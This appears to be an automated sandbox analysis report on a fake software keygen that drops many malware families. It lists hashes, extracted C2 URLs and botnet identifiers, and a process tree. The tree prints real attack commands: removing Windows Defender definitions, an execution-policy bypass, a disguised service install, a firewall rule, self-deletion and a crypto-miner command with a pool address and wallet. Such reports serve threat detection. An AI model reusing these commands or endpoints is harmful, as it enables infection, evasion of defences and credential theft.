Analysis

  • max time kernel
    1108s
  • max time network
    1121s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    05-03-2021 05:11

Errors

Reason
Machine shutdown

General

  • Target

    Raxco.Perfect.Registry.2.0.0.2.key.code.generator.exe

  • Size

    8.6MB

  • MD5

    4c5d5630a17759bff9cb25a75a6de902

  • SHA1

    7e30a081298ef34a5f7db00607f10c72464e4c96

  • SHA256

    45411d2b5bf4e2d0e75af577252aba0a84ccc51e7b05e9b67a54390bb7aab8d8

  • SHA512

    09d2a7fa28f88dd5c622b99318a7d68b1c3f9f6fa3edbe589cb067478dba73e790346b967599dde0745e8afeded0096c99d796206f691c34c903c97a01db80f3

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Extracted

Family

smokeloader

Version

2020

C2

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

rc4.i32
rc4.i32

Extracted

Family

smokeloader

Version

2019

C2

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

e71b51d358b75fe1407b56bf2284e3fac50c860f

Attributes
  • url4cnc

    https://telete.in/oidmrwednesday

rc4.plain
rc4.plain

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • ElysiumStealer

    ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.

  • ElysiumStealer Payload 1 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 6 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Pony,Fareit

    Pony is a Remote Access Trojan application that steals information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Taurus Stealer

    Taurus is an infostealer first seen in June 2020.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Modifies boot configuration data using bcdedit 14 IoCs
  • XMRig Miner Payload 1 IoCs
  • Creates new service(s) 1 TTPs
  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Sets service image path in registry 2 TTPs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 25 IoCs
  • Runs ping.exe 1 TTPs 6 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Raxco.Perfect.Registry.2.0.0.2.key.code.generator.exe
    "C:\Users\Admin\AppData\Local\Temp\Raxco.Perfect.Registry.2.0.0.2.key.code.generator.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1700
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1236
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1280
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
            • Executes dropped EXE
            PID:1076
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
        keygen-step-3.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:768
        • C:\Windows\SysWOW64\cmd.exe
          cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1560
          • C:\Windows\SysWOW64\PING.EXE
            ping 1.1.1.1 -n 1 -w 3000
            5⤵
            • Runs ping.exe
            PID:1440
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        3⤵
        • Executes dropped EXE
        PID:268
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1788
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies data under HKEY_USERS
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1572
          • C:\Users\Admin\AppData\Roaming\690A.tmp.exe
            "C:\Users\Admin\AppData\Roaming\690A.tmp.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1464
            • C:\Users\Admin\AppData\Roaming\690A.tmp.exe
              "C:\Users\Admin\AppData\Roaming\690A.tmp.exe"
              6⤵
              • Executes dropped EXE
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:1736
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
            5⤵
              PID:1056
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.0.0.1
                6⤵
                • Runs ping.exe
                PID:1368
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Writes to the Master Boot Record (MBR)
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Modifies system certificate store
            PID:920
            • C:\Windows\SysWOW64\msiexec.exe
              msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
              5⤵
              • Enumerates connected drives
              • Suspicious behavior: GetForegroundWindowSpam
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:408
            • C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
              C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of SetThreadContext
              PID:796
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                  PID:908
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  6⤵
                    PID:1684
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe"
                    6⤵
                      PID:1904
                    • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                      C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:2132
                    • C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
                      "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Writes to the Master Boot Record (MBR)
                      PID:2164
                    • C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
                      C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
                      6⤵
                      • Executes dropped EXE
                      PID:2848
                      • C:\Users\Admin\AppData\Local\Temp\is-6RB4D.tmp\23E04C4F32EF2158.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-6RB4D.tmp\23E04C4F32EF2158.tmp" /SL5="$60196,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
                        7⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        PID:2864
                        • C:\Program Files (x86)\DTS\seed.sfx.exe
                          "C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
                          8⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          PID:2920
                          • C:\Program Files (x86)\Seed Trade\Seed\seed.exe
                            "C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
                            9⤵
                            • Executes dropped EXE
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: MapViewOfSection
                            PID:1900
                        • C:\Windows\SysWOW64\cmd.exe
                          "cmd.exe" /c "start https://iplogger.org/14Zhe7"
                          8⤵
                            PID:2932
                            • C:\Program Files\Internet Explorer\iexplore.exe
                              "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Zhe7
                              9⤵
                              • Modifies Internet Explorer settings
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of SetWindowsHookEx
                              PID:2996
                              • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2996 CREDAT:275457 /prefetch:2
                                10⤵
                                • Modifies Internet Explorer settings
                                • Suspicious use of SetWindowsHookEx
                                PID:1920
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
                        6⤵
                          PID:1452
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 127.0.0.1 -n 3
                            7⤵
                            • Runs ping.exe
                            PID:1744
                      • C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
                        C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
                        5⤵
                        • Executes dropped EXE
                        • Writes to the Master Boot Record (MBR)
                        PID:1188
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c taskkill /f /im chrome.exe
                          6⤵
                            PID:380
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im chrome.exe
                              7⤵
                              • Kills process with taskkill
                              PID:1064
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
                            6⤵
                              PID:1240
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.1 -n 3
                                7⤵
                                • Runs ping.exe
                                PID:744
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
                            5⤵
                              PID:820
                              • C:\Windows\SysWOW64\PING.EXE
                                ping 127.0.0.1 -n 3
                                6⤵
                                • Runs ping.exe
                                PID:860
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"
                            4⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            PID:1184
                            • C:\Users\Admin\AppData\Local\Temp\9ZKFTVRJ7Z\multitimer.exe
                              "C:\Users\Admin\AppData\Local\Temp\9ZKFTVRJ7Z\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Windows directory
                              PID:1164
                              • C:\Users\Admin\AppData\Local\Temp\9ZKFTVRJ7Z\multitimer.exe
                                "C:\Users\Admin\AppData\Local\Temp\9ZKFTVRJ7Z\multitimer.exe" 1 101
                                6⤵
                                • Executes dropped EXE
                                PID:1468
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:2020
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c taskkill /f /im chrome.exe
                              5⤵
                                PID:1976
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im chrome.exe
                                  6⤵
                                  • Kills process with taskkill
                                  PID:1092
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:2028
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:1652
                              • C:\ProgramData\1399329.15
                                "C:\ProgramData\1399329.15"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1148
                              • C:\ProgramData\4410214.48
                                "C:\ProgramData\4410214.48"
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Adds Run key to start application
                                PID:744
                                • C:\ProgramData\Windows Host\Windows Host.exe
                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:912
                              • C:\ProgramData\6136200.67
                                "C:\ProgramData\6136200.67"
                                5⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:1188
                            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
                              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
                              4⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Adds Run key to start application
                              • Modifies system certificate store
                              PID:1560
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                5⤵
                                • Executes dropped EXE
                                PID:380
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2324
                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2756
                      • C:\Windows\system32\msiexec.exe
                        C:\Windows\system32\msiexec.exe /V
                        1⤵
                        • Enumerates connected drives
                        • Suspicious use of AdjustPrivilegeToken
                        PID:852
                        • C:\Windows\syswow64\MsiExec.exe
                          C:\Windows\syswow64\MsiExec.exe -Embedding AD51D0E95EA39F22C05603D05D89A550 C
                          2⤵
                          • Loads dropped DLL
                          PID:1160
                      • C:\Users\Admin\AppData\Local\Temp\B220.exe
                        C:\Users\Admin\AppData\Local\Temp\B220.exe
                        1⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:2248
                        • C:\Windows\SysWOW64\icacls.exe
                          icacls "C:\Users\Admin\AppData\Local\1aef81e0-8a1a-4546-8790-810d849abe9b" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                          2⤵
                          • Modifies file permissions
                          PID:2436
                        • C:\Users\Admin\AppData\Local\Temp\B220.exe
                          "C:\Users\Admin\AppData\Local\Temp\B220.exe" --Admin IsNotAutoStart IsNotTask
                          2⤵
                          • Executes dropped EXE
                          PID:2476
                          • C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin1.exe
                            "C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin1.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:2956
                            • C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin1.exe
                              "C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin1.exe" --Admin
                              4⤵
                              • Executes dropped EXE
                              PID:2752
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
                                5⤵
                                  PID:1612
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList '-NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Admin\AppData\Local\script.ps1""' -Verb RunAs}"
                                  5⤵
                                    PID:2076
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\script.ps1
                                      6⤵
                                        PID:1772
                                    • C:\Program Files\Windows Defender\mpcmdrun.exe
                                      "C:\Program Files\Windows Defender\mpcmdrun.exe" -removedefinitions -all
                                      5⤵
                                      • Deletes Windows Defender Definitions
                                      PID:840
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\delself.bat""
                                      5⤵
                                        PID:268
                                  • C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin2.exe
                                    "C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin2.exe"
                                    3⤵
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    PID:3004
                                  • C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin.exe
                                    "C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:2020
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\updatewin.exe
                                      4⤵
                                        PID:1944
                                        • C:\Windows\SysWOW64\timeout.exe
                                          timeout /t 3
                                          5⤵
                                          • Delays execution with timeout.exe
                                          PID:1656
                                    • C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\5.exe
                                      "C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\5.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Checks processor information in registry
                                      PID:1640
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\48e5b99f-3828-4c29-adce-83a74f9e057b\5.exe" & del C:\ProgramData\*.dll & exit
                                        4⤵
                                          PID:1564
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im 5.exe /f
                                            5⤵
                                            • Kills process with taskkill
                                            PID:2784
                                          • C:\Windows\SysWOW64\timeout.exe
                                            timeout /t 6
                                            5⤵
                                            • Delays execution with timeout.exe
                                            PID:1856
                                  • C:\Users\Admin\AppData\Local\Temp\B6C3.exe
                                    C:\Users\Admin\AppData\Local\Temp\B6C3.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:1636
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c echo MFbR
                                      2⤵
                                        PID:1124
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c cmd < Declinante.html
                                        2⤵
                                          PID:2232
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd
                                            3⤵
                                              PID:2380
                                              • C:\Windows\SysWOW64\findstr.exe
                                                findstr /V /R "^vbzKnQFSqnlAJtUxNfEmiqqLJfcsIqUhKbnAvosGDfELCESlYcgqhNQcvIqpchlqDWPjFzXEXXVRvfoyblzjLTqXHrtOiokftEiFOGFFnJrfSYZuAVMkUYgKWSECgobOMFMRoCdQFOOwQKtJrX$" Quel.cab
                                                4⤵
                                                  PID:2520
                                                • C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
                                                  Sui.com Benedetto.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:2504
                                                  • C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
                                                    C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:2544
                                                    • C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
                                                      C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Checks processor information in registry
                                                      PID:968
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im Sui.com /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com" & del C:\ProgramData\*.dll & exit
                                                        7⤵
                                                          PID:1988
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill /im Sui.com /f
                                                            8⤵
                                                            • Kills process with taskkill
                                                            PID:1936
                                                          • C:\Windows\SysWOW64\timeout.exe
                                                            timeout /t 6
                                                            8⤵
                                                            • Delays execution with timeout.exe
                                                            PID:2056
                                                  • C:\Windows\SysWOW64\PING.EXE
                                                    ping 127.0.0.1 -n 30
                                                    4⤵
                                                    • Runs ping.exe
                                                    PID:1248
                                            • C:\Users\Admin\AppData\Local\Temp\BC30.exe
                                              C:\Users\Admin\AppData\Local\Temp\BC30.exe
                                              1⤵
                                              • Executes dropped EXE
                                              PID:1040
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nrjvtktc\
                                                2⤵
                                                  PID:1936
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\toskalnl.exe" C:\Windows\SysWOW64\nrjvtktc\
                                                  2⤵
                                                    PID:2672
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    "C:\Windows\System32\sc.exe" create nrjvtktc binPath= "C:\Windows\SysWOW64\nrjvtktc\toskalnl.exe /d\"C:\Users\Admin\AppData\Local\Temp\BC30.exe\"" type= own start= auto DisplayName= "wifi support"
                                                    2⤵
                                                      PID:2560
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      "C:\Windows\System32\sc.exe" description nrjvtktc "wifi internet conection"
                                                      2⤵
                                                        PID:2676
                                                      • C:\Windows\SysWOW64\sc.exe
                                                        "C:\Windows\System32\sc.exe" start nrjvtktc
                                                        2⤵
                                                          PID:2708
                                                        • C:\Windows\SysWOW64\netsh.exe
                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                          2⤵
                                                            PID:2980
                                                        • C:\Windows\SysWOW64\nrjvtktc\toskalnl.exe
                                                          C:\Windows\SysWOW64\nrjvtktc\toskalnl.exe /d"C:\Users\Admin\AppData\Local\Temp\BC30.exe"
                                                          1⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetThreadContext
                                                          PID:2204
                                                          • C:\Windows\SysWOW64\svchost.exe
                                                            svchost.exe
                                                            2⤵
                                                            • Drops file in System32 directory
                                                            • Suspicious use of SetThreadContext
                                                            PID:2912
                                                            • C:\Windows\SysWOW64\svchost.exe
                                                              svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
                                                              3⤵
                                                                PID:2248
                                                          • C:\Users\Admin\AppData\Local\Temp\CF06.exe
                                                            C:\Users\Admin\AppData\Local\Temp\CF06.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            PID:2140
                                                          • C:\Users\Admin\AppData\Local\Temp\D03F.exe
                                                            C:\Users\Admin\AppData\Local\Temp\D03F.exe
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:1656
